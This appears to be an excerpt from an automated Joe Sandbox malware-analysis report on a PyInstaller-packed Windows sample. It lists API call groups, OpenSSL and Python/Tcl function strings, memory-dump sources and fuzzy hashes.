                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8219222B1878291F7449B56E861BFA5350EB44BC4F444232EE7DDB7DEDE2DE9428700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_set_fd
                                                                                                                                                                                                                            • API String ID: 1552677711-3152457077
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878605073.00007FFE0E141000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFE0E140000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e140000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassert
                                                                                                                                                                                                                            • String ID: OCB_ENCRYPT==direction || OCB_DECRYPT==direction$src/raw_ocb.c
                                                                                                                                                                                                                            • API String ID: 3234217646-1106498308
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_strdup
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_conf.c
                                                                                                                                                                                                                            • API String ID: 2148955802-1527728938
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_memdup
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                            • API String ID: 3962629258-2868363209
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_mallocP_expand_block
                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\ssl3_record.c
                                                                                                                                                                                                                            • API String ID: 3543690440-2721125279
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_strndup
                                                                                                                                                                                                                            • String ID: D:\a\1\s\include\internal/packet.h
                                                                                                                                                                                                                            • API String ID: 2641571835-2521442236
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_cleanseO_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\ssl3_buffer.c
                                                                                                                                                                                                                            • API String ID: 4015144264-837614940
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                            • API String ID: 2581946324-1080266419
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free
                                                                                                                                                                                                                            • String ID: ..\s\crypto\packet.c
                                                                                                                                                                                                                            • API String ID: 2581946324-3021818708
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2419E7: CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF283CA5
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: EVP_PKEY_free.LIBCRYPTO-3 ref: 00007FFDFF24E736
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: EVP_PKEY_free.LIBCRYPTO-3 ref: 00007FFDFF24E74D
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF24E789
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: OPENSSL_sk_pop_free.LIBCRYPTO-3 ref: 00007FFDFF24E79C
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF24E7B5
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: CRYPTO_clear_free.LIBCRYPTO-3 ref: 00007FFDFF24E7D5
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF24E7EE
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF24E807
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF24E828
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF24E841
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF24E85A
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF24120D: memset.VCRUNTIME140 ref: 00007FFDFF24E876
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3 ref: 00007FFDFF248092
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free$Y_free$L_sk_pop_freeO_clear_freememset
                                                                                                                                                                                                                            • String ID: ..\s\ssl\d1_lib.c
                                                                                                                                                                                                                            • API String ID: 4031674668-490761327
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free
                                                                                                                                                                                                                            • String ID: ..\s\crypto\packet.c
                                                                                                                                                                                                                            • API String ID: 2581946324-3021818708
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions.c
                                                                                                                                                                                                                            • API String ID: 2581946324-1165805907
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\ssl3_buffer.c
                                                                                                                                                                                                                            • API String ID: 2581946324-837614940
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: D_unlockD_write_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1724170673-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_memcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2788248766-0
                                                                                                                                                                                                                            • Opcode ID: 9b4bf22e043f100f45874ea9a8447de73f5f6139368830c5a3450ddeab77ac2f
                                                                                                                                                                                                                            • Instruction ID: 14d6eba2a28e454887deb481e58a24b0c517f6d05746bf7dcc8e703bb88c1366
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b4bf22e043f100f45874ea9a8447de73f5f6139368830c5a3450ddeab77ac2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4D0A91AF0310282E748B23E8CA26E803C0AB80750FE48038E62EC2BC2DD0CDAA74600
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_memcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2788248766-0
                                                                                                                                                                                                                            • Opcode ID: 9b4bf22e043f100f45874ea9a8447de73f5f6139368830c5a3450ddeab77ac2f
                                                                                                                                                                                                                            • Instruction ID: 15513b8904969c33f6915c1b6c5f1ebca0e8ed4fac61a7e5c873d5b9d477489a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b4bf22e043f100f45874ea9a8447de73f5f6139368830c5a3450ddeab77ac2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DD0A91AF0300282E748B23A8CA25A803C0AB80750FE88034E22DC2AD2DC0CDAA74A00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: D_run_once
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1403826838-0
                                                                                                                                                                                                                            • Opcode ID: 9b7345ca23dfe32898bfd37b1440cbbea1254ee4ad9b9421ce13ebf6d84bdc2a
                                                                                                                                                                                                                            • Instruction ID: d8150566ad3ef4f67b11898f68b2d43941c5fb6cf99fbe12d8bd22f396676ebb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b7345ca23dfe32898bfd37b1440cbbea1254ee4ad9b9421ce13ebf6d84bdc2a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFD05E28F0654386E7086724DC728B023906F40301FC04235D43DC21E9DE1CAA068A00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029950A0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029950E1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF602995106
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF60299512B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF602995153
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF60299517B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951A3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951CB
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951F3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                            • API String ID: 190572456-2007157414
                                                                                                                                                                                                                            • Opcode ID: 9ce22c7e3f960430e7b86c5184534ff0638df419cfc570d1de65ba3543624de3
                                                                                                                                                                                                                            • Instruction ID: 8d03703544bf227b1785009ca476e9f0aaa7ce48e410fdc29011545e5a774c2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ce22c7e3f960430e7b86c5184534ff0638df419cfc570d1de65ba3543624de3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B12B464D0EB0394FA17DB5BA9601B52BA0EF0976CFB51435CC4E822A3EFFCB5589241
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                            • API String ID: 190572456-573889970
                                                                                                                                                                                                                            • Opcode ID: da2a48819edd5d87f038863f33265e6f2153e637403049e828f7f12ef4b7c937
                                                                                                                                                                                                                            • Instruction ID: daa8097969e0aeecd5d4266b5331f11b8e067ceaf159f9b0f296e560310d9139
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da2a48819edd5d87f038863f33265e6f2153e637403049e828f7f12ef4b7c937
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABE1F960D1DB0398FA16CB8BA9141B42BA9AF1975CFB40436C84D92367EFFCF568D240
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_set_debug$M_construct_octet_string$R_newR_set_errorX_free$D_get0_nameD_get_sizeF_deriveF_fetchF_freeM_construct_endM_construct_intM_construct_utf8_stringX_new
                                                                                                                                                                                                                            • String ID: ..\s\ssl\tls13_enc.c$TLS13-KDF$data$digest$key$label$mode$prefix$tls13 $tls13_hkdf_expand
                                                                                                                                                                                                                            • API String ID: 2131617303-57965188
                                                                                                                                                                                                                            • Opcode ID: b504d739be58bbbb411b299b38167c1e61ab93e670787b231739efea94c42964
                                                                                                                                                                                                                            • Instruction ID: 8ddbbd7955e3d0f2d7fb713e9b321c47f35b5477cb397440dd4c8c3447ff562d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b504d739be58bbbb411b299b38167c1e61ab93e670787b231739efea94c42964
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDA1A222B08A8686E715DF64D471AED6720EF95788F449231EE6CD76DAEF3CE181C700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_X_set0_default$E_freeH_freeM_read_bio_O_freeR_newX509X509_free$E_dupH_newH_retrieveL_sk_new_nullL_sk_pop_freeO_ctrlO_newO_s_fileR_clear_errorR_set_debugR_set_errorX509_get_subject_nameX509_new_ex
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_cert.c$SSL_load_client_CA_file_ex
                                                                                                                                                                                                                            • API String ID: 1433350638-4230349072
                                                                                                                                                                                                                            • Opcode ID: 585c96a69667f732b871924750226f658d6ad0b539c62d838a62c6fe2f00e89e
                                                                                                                                                                                                                            • Instruction ID: 6f653345e3770201f4dbb0ede253791394bea54553dc341334dc7ec143a2e811
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 585c96a69667f732b871924750226f658d6ad0b539c62d838a62c6fe2f00e89e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33511E11F0D64249FB59AA52A971EB953519F85BC8F885230EE7DC77CEEE6CE4018700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c$SSL_CTX_use_certificate$ssl_set_cert
                                                                                                                                                                                                                            • API String ID: 1552677711-1118281239
                                                                                                                                                                                                                            • Opcode ID: 7544aaceb32ee0bc5dd69bbb7bafa26445c341ec586eb0842544501036b3be6a
                                                                                                                                                                                                                            • Instruction ID: c8b779efc21d1669ee3f492c9b3a6ef6beba26cd00508760ec48f6e87d34fb2a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7544aaceb32ee0bc5dd69bbb7bafa26445c341ec586eb0842544501036b3be6a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6617521B1898246EB449B15E461AFD9360EBC97C4F944231EF7DC7BDEEE2CD9418B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_errorX509_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c$SSL_use_certificate_file
                                                                                                                                                                                                                            • API String ID: 2680622528-1790157741
                                                                                                                                                                                                                            • Opcode ID: d7a1691e2fac492bf17abb46e1ceb099bb4e3e491f8d4f7470404fce1e06771c
                                                                                                                                                                                                                            • Instruction ID: 859b79b5b96f0c804201111be864b733f7153dd2fafad56c4608d3584ef671ff
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7a1691e2fac492bf17abb46e1ceb099bb4e3e491f8d4f7470404fce1e06771c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8417C10B0DA8295F714A751E4B1AFD9350AF84794F944232EE7CC76EFEE2DE8458B01
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$R_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_verify_client_post_handshake
                                                                                                                                                                                                                            • API String ID: 3782669924-2026983811
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa_legacy.c$SSL_use_RSAPrivateKey_file
                                                                                                                                                                                                                            • API String ID: 1899708915-3218138449
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_$E_freeL_sk_set_cmp_func$E_dupL_sk_findL_sk_pushM_read_bio_O_freeR_clear_errorR_newR_set_debugR_set_errorX509X509_freeX509_get_subject_name
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_cert.c$SSL_add_file_cert_subjects_to_stack
                                                                                                                                                                                                                            • API String ID: 3264509243-2950585956
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$D_get_sizeR_set_debugY_get_size
                                                                                                                                                                                                                            • String ID: ..\s\ssl\t1_lib.c$gfffffff$gfffffff$gfffffff$tls_choose_sigalg
                                                                                                                                                                                                                            • API String ID: 2573607796-412855087
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa_legacy.c$SSL_CTX_use_RSAPrivateKey_file
                                                                                                                                                                                                                            • API String ID: 1899708915-485430192
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DigestSign$Update$D_get_sizeFinalM_construct_endM_construct_size_tR_get_modeX_ctrlX_freeX_get0_cipherX_get0_mdX_get_pkey_ctxX_newX_set_params
                                                                                                                                                                                                                            • String ID: tls-data-size
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$set_client_ciphersuite
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$L_sk_valueR_clear_errorX509_get0_pubkey
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$tls_post_process_server_certificate
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                            APIs
